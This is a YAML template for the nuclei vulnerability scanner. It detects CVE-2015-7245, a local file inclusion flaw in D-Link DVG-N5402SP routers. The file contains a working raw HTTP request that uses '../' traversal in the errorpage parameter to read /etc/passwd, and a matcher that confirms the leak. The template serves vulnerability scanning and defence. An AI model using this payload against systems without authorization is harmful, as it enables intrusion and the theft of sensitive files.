nuclei-templates/cves/2015/CVE-2015-7245.yaml

35 lines
1.2 KiB
YAML

id: CVE-2015-7245
info:
name: D-Link DVG-N5402SP - Local File Inclusion
author: 0x_Akoko
severity: high
description: |
D-Link DVG-N5402SP is susceptible to local file inclusion in products with firmware W1000CN-00, W1000CN-03, or W2000EN-00. A remote attacker can read sensitive information via a .. (dot dot) in the errorpage parameter.
reference:
- https://packetstormsecurity.com/files/135590/D-Link-DVG-N5402SP-Path-Traversal-Information-Disclosure.html
- https://www.exploit-db.com/exploits/39409/
- https://nvd.nist.gov/vuln/detail/CVE-2015-7245
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2015-7245
cwe-id: CWE-22
tags: cve,cve2015,dlink,lfi,packetstorm,edb
requests:
- raw:
- |
POST /cgibin/webproc HTTP/1.1
Host: {{Hostname}}
getpage=html%2Findex.html&*errorpage*=../../../../../../../../../../../etc/passwd&var%3Amenu=setup&var%3Apage=connected&var%&objaction=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
# Enhanced by mp on 2022/09/30